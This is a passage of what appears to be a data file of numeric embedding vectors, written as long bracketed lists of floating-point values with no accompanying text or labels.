37,0.0019564393,0.004328637,-0.015909243,-0.017008439,0.007560863,0.004057127,-0.006394637,-0.010181686,-0.01589144,0.0008061621,0.00038300123,0.0108394725,-0.008250085,-0.007956645,0.003750056,-0.019175889,0.01389134,0.02258792,0.0032449819,-0.01728214,-0.015218519,0.024080778,-0.003918161,-0.022611862,-0.0036133614,0.013857129,0.031044642,-0.005960494,-0.020329868,0.029536255,0.0074734483,-0.001060256,-0.0025811428,-0.00482592,-0.03708691,0.019474976,0.005045764,-0.010308996,0.0024519225,0.011862474,-0.0090859495,0.023695678,0.029529087,0.0055507002,-0.026217967,-0.0008781272,-0.013374014,0.0054631457,-0.015200948,0.017876834,-0.021623308,-0.011332257,-0.0015373849,-0.053127624,-0.006188525,0.009334641,-0.009800523,-0.001323051,0.009290024,-0.0062766904,-0.0057980632,-0.011955844,0.020962076,0.00819885],[0.007391323,-0.0030775494,-0.013141508,-0.03431951,0.0068959403,-0.015810702,0.017497633,0.026786963,-0.0030857846,-0.010876825,0.004735738,0.018882565,0.015886901,0.0017338139,0.0019342058,0.010316462,-0.00091347337,0.009409449,0.0058343993,-0.013779772,-0.0001857565,-0.00920666,0.015383213,-0.011450817,0.00032618086,0.0077530397,-0.0064278888,-0.0021383292,0.0059031076,-0.0010078505,-0.011890746,0.025796702,-0.0090806065,0.0037855688,0.010938583,0.019076323,-0.031762686,-0.020160222,0.007051468,-0.0052183447,-0.019136874,0.03209559,-0.010847979,0.031144546,0.0068985308,0.0131920185,-0.009066022,0.008250105,-0.0073252367,0.017654378,-0.0045334236,-0.00026214533,-0.052636206,0.01826818,-0.009697062,0.006398017,0.0041540302,-0.036026873,0.012380585,-0.019157307,0.0016509825,0.0045087542,0.01600966,-0.028234506,0.042338666,-0.0009334538,-0.010179258,-0.042761162,-0.000006525467,-0.010523937,0.012309404,-0.0058571002,0.0038064767,-0.006513358,0.023273595,0.004719685,-0.011565481,-0.017297816,-0.013631065,0.010848264,-0.014155264,-0.012791714,-0.0016705837,0.0034877034,0.014012241,0.01590314,-0.0028360114,-0.003061144,-0.021431603,-0.021340752,0.012201793,0.011470909,0.006695296,0.003430111,-0.0018038516,0.010071153,-0.000683403,-0.012276401,-0.01851259,0.005378787,-0.0033263317,-0.0078072036,-0.025945563,0.016856698,-0.0054743863,-0.011283115,-0.010095042,-0.011947045,-0.00045029828,-0.000031267762,-0.0000025163215,0.005437739,0.008100692,0.0024412265,-0.0120368125,-0.0019282068,-0.011893857,0.014850573,0.0052345702,0.012580325,0.022895865,0.022189498,0.0005406775,0.0094260005,-0.021654777,-0.01168246,0.005032088,0.027846398,0.0019568382,-0.014055573,-0.0016059668,0.0063196714,-0.0016573617,-0.0086978655,0.0020363645,0.0055692126,0.0090681715,-0.008817829,-0.0021166261,-0.0052307723,0.027052552,-0.0021879289,0.030619904,-0.0054560583,0.012877687,0.0153412605,0.00074388244,0.022317214,0.02061846,-0.01880683,0.015141009,-0.003130232,0.028735712,-0.011111699,-0.0028597328,0.010860387,0.005462301,-0.019400682,-0.018435983,-0.024414666,0.021614071,0.00043967346,0.0025230993,-0.004344874,-0.022283971,-0.028294696,-0.0064867884,-0.027786493,-0.01379226,-0.0043350467,0.031524085,0.027544573,0.014165183,0.0074303476,-0.013325954,0.0067591653,0.009656127,-0.01352894,-0.0029199047,0.00540654,0.024991963,0.001598304,-0.016491864,-0.021710375,-0.020667007,0.034495838,0.02222488,0.026447505,-0.011017632,-0.013327872,-0.0097187,-0.008718139,-0.00042373608,-0.0071010445,-0.010740082,-0.011549493,-0.01817507,0.081061244,-0.01612201,0.0001399002,-0.00166522,-0.00012278646,0.015006715,-0.05048809,-0.003210045,-0.007384525,0.0058405064,-0.0026832817,0.0022093656,0.006163035,0.026294935,-0.023974968,-0.0035178568,0.010590666,0.0063585266,-0.06210535,0.014731759,0.013318427,-0.0014193928,0.0032429919,-0.017219177,0.010016467,-0.00240451,-0.01534561,-0.012705295,-0.0063608233,0.0052886093,0.0015241668,-0.019573882,-0.024453806,0.011677932,0.0010486955,-0.0063379025,-0.02706146,0.022755587,-0.018076302,0.0111979125,-0.00656354,-0.008360659,0.006417301,-0.011066387,0.0068256785,0.008172529,0.004171895,-0.014155363,-0.016665354,-0.010791597,-0.014080141,-0.0007183443,0.024132263,-0.00448101,0.0058514737,0.017186336,0.024673807,-0.009982903,-0.03839006,0.021472646,-0.02296592,0.0038370688,-0.012017633,0.05104517,0.026351448,-0.017347863,0.026772486,0.015267047,-0.0032461984,0.0075708586,-0.030718483,-0.004120684,-0.01922271,-0.016497258,0.00824437,0.0034744549,-0.0122407805,0.007769175,-0.01436031,-0.0006511279,-0.0016189929,0.006879935,-0.0013604433,-0.0020396137,0.010071587,0.009199316,-0.040211912,-0.010154878,0.023142485,0.00881873,0.018762443,0.022841427,-0.007170714,0.0008448238,-0.008680015,0.021990344,0.00019236025,-0.024112614,0.011793387,-0.018809354,0.02535864,0.030793903,-0.011860479,0.011593934,-0.0017920375,0.012674011,-0.0011955847,-0.0000573681,-0.0007267691,-0.02004308,0.032572504,-0.029679235,0.012261702,-0.051371224,-0.019760631,-0.006152295,0.0031049817,0.011526319,0.019457692,-0.0034473676,-0.005331773,-0.025683347,-0.016694862,0.008308776,-0.024843384,0.013704473,-0.01584645,-0.016991466,-0.00033021264,-0.002202947,-0.014115094,0.019813403,0.0059934654,-0.013616554,-0.0050993552,0.010028895,0.017368915,-0.02857654,0.009093134,-0.003033649,0.029091155,0.015743878,-0.0041394294,-0.01617117,-0.021935813,-0.0000565891,0.014588475,-0.010804636,-0.014967911,0.014416303,-0.010504341,0.011792736,0.011327818,0.01643512,-0.04078861,-0.009136781,-0.0038071072,-0.03996701,0.0031725438,-0.0047820807,-0.0037076105,-0.012050138,-0.009772711,0.031232774,-0.024694536,0.0074143657,0.0064306306,0.090381086,0.01945403,-0.01927104,-0.002216048,0.001587378,0.011547122,0.024906194,0.016639754,0.0052543506,-0.0016934251,-0.02187988,0.011357002,-0.00043479295,0.033476397,-0.010023991,0.014329874,-0.024507789,-0.018343544,-0.03510506,-0.018237812,0.016817603,-0.009987507,-0.00462457,0.009114506,0.01609084,0.027195461,0.012950902,-0.019043714,0.00074597396,-0.006705797,-0.0022511475,0.018502282,0.029359367,0.017281258,-0.01665082,0.012013818,0.030952636,-0.0044233096,-0.03191929,0.0059884856,0.017239006,0.000034793895,-0.021636978,-0.02681553,-0.0049876343,0.053380594,-0.001033435,-0.0024247775,-0.030043548,0.03732066,-0.0026284552,0.013564809,-0.009449694,0.013479212,-0.0004610424,0.021511963,0.0090211965,-0.033289455,0.045346394,0.025832592,0.017430224,0.031429302,-0.0046656053,0.0003440574,0.0010068165,0.0056662005,-0.0039486536,-0.011924294,-0.014015074,-0.013555685,0.006360195,0.0037478928,0.00023862555,-0.0054830555,0.014935349,0.017549563,-0.0046424083,-0.018853344,0.0070704687,0.0486932,-0.023537703,-0.0050443625,-0.0056007234,0.015484466,0.00066322356,-0.0025145533,-0.0072461907,-0.0045292648,0.028730502,-0.028625485,0.0012352136,0.00025326226,0.028591266,0.018507622,0.010241222,0.02840874,0.019978289,0.017293237,0.0052264594,0.005490936,0.010466527,0.011123777,-0.01269704,-0.018260017,0.0062510185,0.0059645823,0.009563342,0.0017845022,0.0035097173,0.027821735,-0.019319952,0.0050144563,0.0058922344,-0.011654371,-0.002529579,-0.0139345415,-0.007843474,0.0008865096,-0.0073708836,-0.002383084,0.030655395,-0.00034393056,0.0020905319,0.011131792,0.00437575,0.000119089316,-0.01510257,-0.020281631,0.015301041,0.020592082,0.020065269,0.010717265,0.0081081195,-0.03194259,0.032225464,0.007023148,-0.020958299,-0.019191345,0.03977545,0.0063554095,0.006280563,0.025833314,0.018147107,-0.0021499046,0.005640008,0.037112366,0.041938838,-0.0094747245,-0.012814923,0.009381197,-0.016294476,-0.0015813676,0.029528778,-0.022519749,0.0020646693,0.003076384,0.03134521,-0.0012655039,-0.008306762,-0.020586988,0.036693122,-0.013456219,-0.0069061527,0.007673287,-0.008633407,0.028584838,-0.011409194,0.064425,-0.015886705,-0.034396514,0.003915986,0.030680476,0.002593141,-0.014620957,-0.009005676,-0.009004907,0.0011184128,-0.01887552,0.013264324,0.0066105537,0.033662446,-0.015611316,-0.0067914445,-0.008094647,0.010386253,-0.017659398,-0.0027162584,-0.009854737,-0.012035195,-0.023832824,-0.022598883,-0.012495694,0.019825403,0.034931816,0.005763611,-0.033909217,-0.011466084,-0.010768689,0.017730601,0.01530931,-0.003298431,-0.0012387822,-0.0017299907,0.008054546,-0.0013589088,0.006563639,0.029854735,-0.002218371,-0.007303974,0.0021828625,0.03983757,0.02987629,0.021892026,-0.002934165,0.010881226,0.026058227,-0.00272872,-0.007973553,0.023505624,0.019972619,0.019322503,-0.013808518,-0.0076427157,-0.014686941,0.008798257,-0.026390245,0.00020734912,0.012816462,-0.004288538,-0.036111195,-0.019148929,-0.033791494,-0.014053331,0.0041217217,-0.01023765,-0.003795747,-0.03518939,-0.014283328,0.019265914,0.011311228,-0.007982269,0.012425479,0.014722696,0.0071898475,0.021925123,0.013093614,-0.016427262,0.006885803,0.017758878,-0.01226825,0.010872266,0.008401573,0.0045252545,0.0014105937,0.0018759184,-0.0017610869,0.004028095,0.0053871013,-0.015585959,0.020635122,0.010325875,0.023181686,-0.009288123,0.010626519,-0.026081543,0.001210208,-0.0133102285,-0.031434454,-0.0070835,-0.014152994,0.018669248,-0.0044870507,0.0070505906,0.013677548,-0.01107315,-0.0099920565,-0.0096341,0.013633641,-0.036881994,-0.0034758104,0.005255914,-0.0017332265,-0.015168112,0.032157212,0.011680616,0.004628619,-0.0005557113,-0.015896888,-0.017042512,0.011433936,-0.0041313176,0.0047543203,0.02101054,-0.011338825,-0.036698725,-0.018645726,-0.0132943,-0.048731215,-0.015425767,0.04009664,0.022665504,0.0071695433,0.0032512133,0.0027050003,-0.0026593176,-0.00619077,0.01280075,-0.03258899,0.010176628,0.0038384402,-0.036524925,0.017963167,0.009314518,-0.0039882357,-0.0043733744,-0.031479467,0.014570905,0.00026083406,0.018067038,-0.0135914115,0.00008009202,0.010142922,-0.016425826,0.015661964,-0.02675746,0.009106851,0.013661787,0.026253494,0.0034950627,-0.007205695,0.0121059045,0.012343831,-0.02566368,0.024422584,0.028080465,0.02769911,0.011048904,0.02741429,0.001904558,0.008670835,0.02157913,-0.012453263,-0.005937533,0.034668732,0.018024975,-0.0008875536,0.013000598,-0.0120679485,0.021762645,-0.005146189,-0.012363951,-0.016068168,0.011145386,0.016062424,0.006352532,0.028845087,-0.0010505274,0.0042347424,-0.0118152425,-0.019789536,-0.017630907,0.016901031,0.028213847,-0.010130561,0.004840929,0.019961502,-0.009374025,-0.014290422,0.0011603242,-0.018202638,0.0016765107,-0.018301344,0.02320417,-0.01828676,-0.002734231,-0.05336739,0.016436232,0.022973021,0.0115629295,0.0013293609,-0.015582308,0.020810515,-0.006599941,-0.009187636,0.0009053061,-0.044948246,-0.009616107,0.021517264,-0.030619767,0.0018716187,0.014323694,-0.00097405544,-0.0022244682,0.025298424,0.00080977945,-0.023893928,0.01372535,-0.008813234,0.0025462392,-0.0013386965,0.037041493,0.011537145,0.005623147,-0.005747689,-0.0016260361,-0.0026731712,0.011629841,0.0056432593,0.011690372,-0.0034830081,0.0043298802,-0.02587961,-0.019373273,-0.022397224,0.012677082,-0.035017915,-0.022859769,0.0073258635,0.010877666,0.0059260023,0.021081846,-0.02132292,0.03371991,0.013090542,-0.010311988,0.004403851,-0.010562352,-0.00014416763,0.021078454,0.03615942,-0.0063263574,-0.036819823,-0.007341325,0.02837215,0.0029902565,0.035346773,-0.013029648,-0.025978075,-0.02637808,-0.0373423,0.002733961,-0.011327318,0.011933398,0.0012065902,-0.032564662,0.03215211,-0.005622987,0.007826681,0.019316256,0.010282647,0.009783852,-0.0014802738,0.009093149,-0.015956523,0.0057484717,0.001687263,-0.011697063,-0.0075908313,0.012201088,-0.018112345,-0.02285738,-0.031387724,-0.0032447032,-0.017759005,0.010578025,-0.0007053209,0.0029131835,-0.026719272,0.032819018,0.012039065,0.019383078,-0.026159242,-0.019711751,-0.00008448652,0.010359959,0.018502392,0.004306646,-0.0034804877,0.04210724,-0.021396726,-0.014694432,0.017537793,-0.0041879895,0.0054209786,0.0001376371,-0.0007609645,-0.0066743316,-0.011412007,0.017679142,-0.029609017,0.0020212121,0.038887497,-0.003787994,-0.0034028038,0.015490901,-0.02156918,-0.0075457813,0.010862287,0.019154537,-0.029872395,0.00034223704,-0.0022376939,-0.02593937,0.0052815177,0.0032251824,0.01635404,0.000030107425,-0.0012552562,0.025436318,0.015822561,-0.040194698,-0.0035952933,-0.0026019667,-0.0014556516,0.008864769,0.00736352,0.0022989393,0.021226585,0.034975547,-0.0015626353,0.006631704,0.022898234,-0.0010512295,0.015886469,-0.017754141,0.009940658,-0.0077701234,0.0010632124,0.026305357,-0.033379953,-0.0056349775,-0.008330572,-0.016979612,0.00478379,-0.037087824,0.013397964,0.0037901339,0.0030667703,0.015671033,-0.0032233964,-0.008099074,-0.0033338522,-0.0033140194,-0.020920565,0.0019307545,0.0050900583,0.013968051,0.001662245,0.0031097906,0.01936021,-0.008324201,0.00687357,0.003608508,-0.009500414,0.012816587,-0.01825732,-0.0030576016,0.0023165615,-0.006473115,0.023714056,0.026667902,0.017855039,0.0015503066,-0.026837278,-0.025305972,0.009070583,-0.015628127,-0.0146270795,-0.0033384974,0.01761,0.014694091,-0.029363824,-0.010570436,-0.0034556491,-0.03937112,0.035904597,-0.01163146,0.002775439,-0.0044272156,-0.013709197,0.007664881,-0.0026712276,0.014616701,-0.012348102,0.01206998,-0.002383845,0.013216208,0.011441655,0.0011231259,0.0024322593,-0.014435298,0.011022301,0.022837844,-0.0146999145,0.006590374,-0.0054731993,0.008950942,0.00044536448,0.02148141,0.016269248,-0.0058819586,0.0041490467,-0.033138845,0.00786531,0.013331541,0.007169703,-0.0022526705,-0.018159866,-0.015169681,-0.022282574,0.0021011608,0.026572743,-0.023682851,0.0070452793,0.00033850965,-0.0047837803,-0.0052823215,0.02805651,-0.019869516,-0.018279023,0.012596573,-0.006615167,-0.0015668669,-0.010364816,0.03351052,0.0077356133,-0.012793163,0.024426702,0.014521167,0.016311498,-0.010097058,0.011335687,0.014296717,-0.0071876314,0.0035311128,-0.013930852,-0.0021501507,0.01675155,-0.025346695,-0.010926219,-0.026238052,0.021671966,-0.008130386,0.0017475145,-0.042031128,-0.008415211,-0.015294491,0.01189757,-0.030929787,0.026625011,-0.028183704,-0.013768863,-0.01093337,-0.030623293,-0.018710103,-0.0014768895,-0.016837992,-0.0075913537,-0.034145,-0.013795764,0.009938189,0.011343723,0.009350378,-0.017568825,-0.01747892,0.014270039,-0.0068345307,0.0154500315,-0.015257881,0.016695624,-0.0101246955,-0.007432907,-0.0033672666,0.00037701408,0.0107301595,-0.010990208,-0.007851026,0.054858077,0.005594068,0.00049845455,0.013993805,0.019267228,-0.0018843629,0.0060638636,-0.009894473,0.0425615,-0.02736327,-0.0024768403,0.019794865,0.0031525637,-0.0107692545,0.0051345197,0.02187053,0.030168345,0.011203344,-0.00024930315,0.026237277,0.010073281,0.010971306,0.011625594,0.019904094,0.008535213,-0.025594357,0.027802888,-0.010837421,0.030308077,0.038449872,-0.0036512176,0.023200536,0.020005254,0.0098282695,-0.010246483,-0.0051087476,-0.0035420118,-0.004686155,-0.013409431,-0.008600492,0.004803504,0.011231807,-0.015503637,0.0095567815,0.009361045,-0.012544009,0.0006605776,0.0039379923,-0.019464996,-0.009081382,-0.0027471392,-0.007944121,0.007322332,0.00077089784,-0.004918811,0.014260601,0.019812822,-0.010375464,-0.024398085,-0.00383596,0.01815164,-0.022717299,-0.013032575,-0.014227731,-0.008746142,-0.016043663,-0.0024007675,-0.011825725,0.0010654123,-0.004595886,0.025395185,-0.00074894394,0.007309348,0.031113388,0.039563075,-0.005368861,-0.008946961,-0.011564503,0.027057054,0.004743833,-0.011052248,-0.013288816,-0.0020597202,-0.009336331,-0.028891413,-0.018963903,-0.0037230423,-0.0052287807,-0.005112949,0.0063869264,0.0042436155,-0.028044607,0.02163891,-0.01698945,0.014411295,-0.0048121107,0.0099930195,0.00184282,0.008157729,0.02961304,0.0018424646,-0.017052427,-0.007954263,-0.0016642165,-0.008832633,0.0018156795,0.009449331,-0.003991613,-0.005201678,-0.003419045,-0.030366618,-0.008098435,0.0007205026,0.0017070174,0.0027088942,0.021087578,-0.031642262,0.022382995,0.023623547,-0.004876128,0.013643526,-0.005876846,-0.013361457,0.047922786,0.008742948,0.0029562435,-0.0053718197,0.018614847,-0.023515562,0.025206726,0.034053948,-0.02287009,0.0050981813,-0.012236986,0.019075898,-0.007839313,-0.008797865,0.006550383,0.018311929,0.024575861,-0.0076542413,-0.014505293,0.01737193,0.0046088747,-0.006641423,0.00041162383,0.034888323,0.0031653277,0.0044172453,0.016617125,-0.0016565026,-0.02698728,0.0039915456,-0.014376022,-0.015295579,0.016101811,-0.019967422,-0.018514687,-0.0012736697,-0.027210109,-0.011056137,-0.008011665,0.011276516,-0.000112555244,0.017016152,-0.0011669378,0.018291898,0.007486579,0.016061198,-0.016806554,-0.0019698646,-0.018648472,0.014760944,-0.018032543,0.019053085,0.019854771,0.014533957,0.021213058,-0.0066721295,-0.001809274,-0.0562606,0.011230778,0.026721494,0.002579692,-0.014012176,0.013655339,0.0059624063,-0.016347302,-0.016439535,0.006043917,0.006761601,0.0015549939,0.0074688043,-0.018979354,-0.007631561,-0.0013926213,-0.025877973,0.055603795,0.0046449658,0.014576281,-0.013484132,0.008413499,-0.016450219,0.008890012,-0.0037495133,0.011429193,-0.017598115,-0.037694737,-0.017672786,0.0015008555,-0.024303425,0.014967375,-0.007152034,-0.0024566997,-0.0040905513,0.004155753,0.003230785,-0.0055900756,0.0026065789,-0.006063701,0.004412132,-0.0012979087,0.008085088,0.017390013,-0.01633632,0.019920217,-0.00995123,0.0022258833,-0.014031457,0.030463755,0.0030973533,0.0028405038,0.0075406535,0.010180405,-0.01366429,-0.023864014,0.006908217,0.011998732,-0.035931397,0.045404483,-0.000091642505,0.011644697,-0.026026806,-0.0074162227,-0.0018126467,0.019953258,-0.021944351,0.022124639,-0.0041882275,-0.013985533,-0.0066220206,-0.002990516,0.010998733,0.00053133036,0.0009675558,0.008297582,-0.00921942,0.007830192,-0.0018842872,-0.004199786,-0.008441562,-0.005188762,0.002378172,0.0049836845,-0.018288966,0.0028317568,-0.006909909,0.008008026,-0.017423665,-0.015646879,0.0009775953,0.005055437,-0.0047639194,0.00027449633,-0.0018543629,-0.0119138695,-0.0065752943,-0.005883829,-0.0058131395,0.046297286,0.010800734,-0.032651816,0.00867176,0.0043658023,-0.008472886,0.06356757,0.01856884,0.008447228,0.014426958,0.008961464,0.010597669,0.026690405,0.018450737,0.011301977,0.01788202,-0.013706167,0.005706078,-0.0079437485,0.014093558,0.011544436,0.0015194904,0.022109652,-0.010562907,-0.0037602778,-0.0076063965,0.0048296275,-0.0001263168,0.025309088,0.005705033,-0.0022102413,0.017471373,-0.0049607665,0.02315829,0.017879426,-0.015178265,-0.02679133,-0.0063259504,0.027895458,0.016406551,-0.010387489,-0.046609137,0.0017621835,0.14979263,0.019201642,-0.017833197,0.022257498,-0.0058916016,0.009340244,-0.08835614,0.012841199,0.0057308185,-0.0019284082,0.011342802,-0.0055738855,-0.011042192,0.011323463,-0.0059621036,0.013313112,0.0016878115,-0.009553948,0.013217918,-0.014405013,-0.011413449,0.0028940635,-0.02674807,-0.0096778525,-0.034221165,0.0061939866,0.002010955,0.0006747215,-0.0070137098,-0.02881499,-0.009006456,-0.01671006,0.010844907,-0.007092908,-0.028801102,0.015590178,0.0092678955,0.015128836,0.007942656,0.0047456655,0.016356977,0.008302903,-0.017751776,-0.023659805,-0.1480258,0.016960032,-0.012736556,-0.033636045,0.016605934,-0.008294081,0.00024542472,-0.008721744,0.016718667,-0.002946988,0.0028063196,0.00786097,-0.004269022,0.018836366,-0.019108739,0.011702888,-0.00032203976,-0.009784967,-0.010678583,-0.007165574,0.029473424,0.01307061,-0.0027409003,-0.032594685,-0.03759701,-0.009082064,0.006526014,0.022348052,-0.028573185,-0.0024439357,-0.021706847,0.024836697,-0.016347485,-0.0014600664,-0.0070767133,-0.026788061,-0.009261455,-0.003478871,-0.0042204387,0.022998307,-0.0020194193,-0.006892479,0.009643083,-0.0055725714,-0.0035870564,0.014026151,-0.0041787173,0.012507882,0.015066215,0.010333282,0.01472938,0.004788307,-0.02324301,0.0016467024,-0.01304775,0.014013595,-0.0041270466,-0.017252937,-0.01581274,0.0016533367,-0.0018374637,-0.04844081,0.0001201327,-0.012909772,0.027769366,0.015709538,0.032077767,-0.015957097,-0.001011452,0.016312065,0.0014866462,0.009052954,-0.012655661,-0.017186508,0.018191893,0.01233645,-0.01629218,0.0017030113,0.022904301,-0.015585744,-0.010038699,0.005890416,-0.0053212103,-0.0041097943,0.02213919,-0.0065597487,0.0075979875,0.023005165,-0.0012013526,-0.018552883,0.012274704,-0.018918915,0.030932846,0.01686046,0.008159356,0.0065699746,0.028068122,-0.013068711,-0.020067973,0.016868945,-0.0017383486,-0.016886916,-0.034605578,0.009797933,-0.00017985338,-0.008610112,-0.017859105,-0.009208252,-0.017554533,-0.025751011,-0.01412709,0.0041995393,0.028042676,-0.007941356,-0.013465192,-0.026246453,0.013131544,-0.0069630607,0.011696658,0.0011759677,-0.014428596,0.016080352,0.0017993657,0.04515656,0.03466427,0.050280694,0.0027469571,-0.017262362,-0.0009892761,0.012315705,-0.026343834,-0.011990126,-0.02460908,0.0030044778,-0.013642529,0.0064979293,-0.015129889,0.001986429,-0.028178053,-0.0023835537,0.0021077688,-0.013905665,0.007616781,0.010306871,0.021984592,-0.03649367,0.024846403,0.02217621,0.011992423,-0.0076382402,-0.005701678,0.022642849,-0.020566527,-0.031624217,0.005980898,0.059155174,-0.006907473,-0.007662829,0.018654514,-0.00094909687,0.030900244,0.009047037,-0.022616392,-0.003703278,0.008687804,-0.012339972,0.002273039,-0.016534686,-0.016839966,-0.020878214,0.018606244,0.007160558,0.028854014,0.006342601,0.009407918,0.012795071,-0.0004120734,-0.012170981,0.0061176177,-0.008807372,0.012369175,0.012964494,0.03112085,0.0024073282,0.013370106,0.00014594245,-0.029831272,0.015014116,-0.0007616018,0.018501751,-0.034270875,0.0033815003,0.0122268675,-0.0033693071,0.0020364446,-0.002524321,0.027632209,0.0064450842,-0.0073254965,-0.012922733,-0.0008661486,-0.00981868,-0.012603435,0.021223536,-0.004010074,0.011766211,0.004741785,0.000971183,-0.019740984,-0.0049588727,-0.010517232,0.006280411,-0.0046998477,-0.0024472887,0.0049151396,0.027523682,-0.012975371,-0.024210384,-0.0059142048,-0.02858168,-0.012186499,-0.0053799287,-0.0049921693,0.006501222,0.012083458,-0.024642114,-0.0049647456,-0.024758205,0.00391634,-0.007240948,0.008194161,0.001050588,-0.0010230085,-0.016716862,0.021977302,-0.007199957,0.016712528,0.0050344407,0.009184677,-0.022977933,-0.05085624,-0.0007564234,0.028013878,-0.010371489,0.0064608445,-0.0013791216,-0.007169042,0.022261988,0.0068614036,0.0069926498,0.009349807,0.021637814,0.010616937,0.021295818,0.012855607,0.013117888,0.0002091206,0.019293102,-0.043148804,0.0013742091,-0.03431607,0.005867063,-0.018448846,0.018200457,-0.014447927,0.00031668894,-0.008150616,0.007590796,-0.022730106,-0.024165513,0.02272814,0.0038863148,0.0031506617,0.017606359,-0.0016923898,0.002407114,0.009448513,0.00477387,-0.0062943767,0.010718594,-0.03170468,0.010213488,0.013461266,-0.021531545,0.013821581,0.017254312,0.04154896,-0.008362037,-0.0021257782,-0.0105567835,0.0102195125,-0.003084305,0.010993901,-0.0026352978,0.021449698,-0.028843114,-0.01652355,0.0022414555,0.0072677745,0.005381561,0.004856298,-0.010307816,0.0077376985,-0.00964341,0.006365031,-0.016748728,0.025856154,-0.0016219672,0.0040160087,-0.011379508,-0.0021822348,-0.0030787424,-0.011866379,-0.019316658,0.0005031777,-0.0008523085,0.017393015,0.011656908,-0.006224626,-0.0020183923,0.010216221,0.05037792,-0.002215837,0.030924937,0.00090920465,-0.003220989,-0.025814595,0.016169976,-0.012654116,0.00253373,0.0030572934,0.01641354,0.028391,-0.02393996,-0.021366777,0.010418334,0.0036035012,0.0017861449,-0.020915322,-0.015077049,0.013689354,-0.00927373,0.016525177,-0.015516443,-0.004629412,-0.014560357,-0.03227778,0.011820244,-0.008479007,0.010477162,0.003485675,0.014098141,-0.01301088,0.014750674,0.02069682,0.0074787233,0.043316066,-0.017669147,-0.022750817,-0.004801556,-0.0039448976,0.0027179627,-0.0168821,-0.010087396,0.004483264,-0.005494886,-0.003532723,-0.009097799,-0.007296496,-0.00935204,-0.03910125,-0.0049617835,0.030453611,-0.009632941,-0.021589747,0.0069812196,-0.015821539,0.010026126,-0.012782184,0.0031920162,-0.006953074,-0.014464723,0.06967384,-0.0040577007,-0.010035491,-0.0037948235,0.019023107,0.032439206,-0.005663839,0.021739941,-0.023235008,-0.011192559,-0.023602402,-0.046290554,-0.00007348414,0.0038290068,-0.018946912,-0.027812824,0.00078694464,-0.012485017,-0.0107472185,-0.009370684,0.0033673362,0.013908075,0.025999483,0.0013255916,-0.007550007,-0.04406647,-0.011889379,0.0061359354,-0.018152686,0.0036747796,0.028860927,-0.004174262,-0.009395298,0.0022133475,-0.037492454,0.0072870827,-0.00107946,0.02286057,0.008065816,0.0084795635,0.023016615,-0.0057003256,-0.011415261,0.013056471,0.013100052,-0.0025580137,0.014770023,-0.0048830216,-0.0029885299,0.013595208,0.0028863002,0.017161842,0.013200969,0.0067645013,-0.015654694,0.0030218381,-0.004640521,-0.0055946163,0.0019590114,-0.0026900778,0.009944348,0.009393483,-0.02685508,-0.003043242,0.01793969,0.029868642,-0.005963765,-0.0072525158,-0.006633471,-0.0017917933,-0.025969336,0.017120272,-0.00004886508,0.012414417,-0.015047214,-0.013624603,0.018216854,0.019617882,0.01913396,0.012501603,-0.011777103,-0.006149215,-0.0025371397,-0.022520121,0.0016810547,0.015844245,0.015012042,0.014078434,0.014641775,0.026809584,0.05526956,-0.02602263,0.02005311,-0.021449542,-0.01328043,0.01171319,-0.0011219609,-0.009852444,0.017196426,-0.021086382,-0.016425548,0.009199869,-0.006091022,-0.0061535616,-0.015100972,0.0034286682,-0.055089656,0.024042167,-0.022876775,-0.03001264,-0.002990269,-0.019949308,-0.003429886,0.0427219,-0.010319831,-0.053905256,-0.0068652253,0.0054017506,0.011221286,-0.0054708957,-0.008811211,0.0030910657,-0.015457095,-0.0063061174,0.012758937,0.0025963946,0.022477427,-0.0057543404,0.0027047258,-0.008627066,0.00041685408,-0.004715781,-0.012138001,0.020569887,-0.0012018642,0.0121507505,-0.004792081,-0.0018179108,0.0010795494,0.02811028,0.0032170508,0.00047564355,-0.017387189,-0.010018564,0.01253646,0.0077037634,0.0057897423,-0.0007119651,-0.0015837982,0.00860646,0.027388196,0.006935664,0.006485142,0.010898424,0.008167198,0.036396272,-0.02094534,-0.03392203,0.009731346,-0.020085832,0.0013539232,-0.030144563,0.011951989,-0.0033381977,-0.010802124,0.0025788127,-0.019037776,-0.0058702184,0.0004580468,-0.015941458,-0.0091193225,0.002068361,-0.00685578,-0.015529959,-0.036716767,-0.0027564885,-0.016849978,0.0065771146,0.004834684,-0.004428978,-0.005549056,0.011462026,0.012455163,-0.011845691,-0.0056394674,0.00079946953,-0.039384454,-0.001444188,-0.0015350372,0.016542504,0.0007401484,-0.0141847385,0.014086614,0.01811115,0.010634645,0.008565603,0.009832831,0.014500698,-0.0043843403,-0.010710212,-0.015532942,0.00088194385,-0.0037064103,0.00949307,0.0022062175,-0.01336011,-0.0063501946,0.0005735407,-0.00054919097,-0.02284396,-0.08280588,-0.026029434,0.014443584,-0.007058397,-0.008818691,-0.004277945,0.024508188,0.01656349,0.017407047,0.0109159555,-0.012918223,-0.0007156053,-0.02536489,-0.0077698906,0.005982909,-0.0018129856,-0.024036987,-0.0018805352,0.0060369177,-0.010704073,-0.007066867,0.0070866058,-0.006286687,0.0062939217,-0.0035249367,0.017486764,-0.0019944413,0.034637447,0.02329407,-0.02875214,0.008974134,0.010388907,-0.026547596,0.007038272,-0.0366621,-0.004319344,0.0066310423,-0.00283352,0.0029171852,-0.0007369672,0.0050142766,0.01468476,0.007607426,0.0061538974,-0.0043933927,0.008610023,-0.018081907,0.02472374,-0.019057252,0.028124658,0.016940651,0.001848371,-0.01217429,-0.0102653755,-0.020426579,0.0011521401,-0.0050245365,0.011006061,-0.008579885,-0.0034162584,-0.028011495,-0.017620478,-0.018234732,0.013129137,-0.031150756,0.020995017,0.013506561,0.024845889,0.011460629,0.012096321,-0.0051221773,0.022011608,0.0036841356,-0.009902454,0.027438108,0.003807129,0.0023735124,0.028928837,-0.020413594,0.008493331,-0.006087413,-0.027252378,-0.0015418401,0.014772005,-0.04484987,0.0054858304,-0.0047850134,0.0093451515,-0.017859323,0.015789075,0.0033763822,0.012384623,-0.02035089,0.033077553,0.028216403,0.04428531,0.03147516,-0.017183492,-0.007709469,-0.009424258,-0.010657366,-0.013131315,-0.013232625,-0.016915336,-0.02492947,0.00851117,0.010631254,-0.021760207,-0.0055601257,-0.013327688,0.014670854,0.024463508,-0.027602863,0.012284743,-0.0045122327,0.016842673,-0.0021380833,-0.0032036519,0.016685078,-0.020460036,-0.003265316,0.016614137,-0.0075386297,-0.019504536,0.0017104382,-0.013889109,-0.025058711,0.024248194,-0.0058079883,-0.0018261472,-0.0019122472,0.007777241,0.03951495,-0.0071452274,-0.0121816965,0.007071426,-0.036759146,0.0056925314,0.005115648,0.008265051,-0.002559165,0.011076155,0.013713166,-0.022981588,0.012940955,0.0027839271,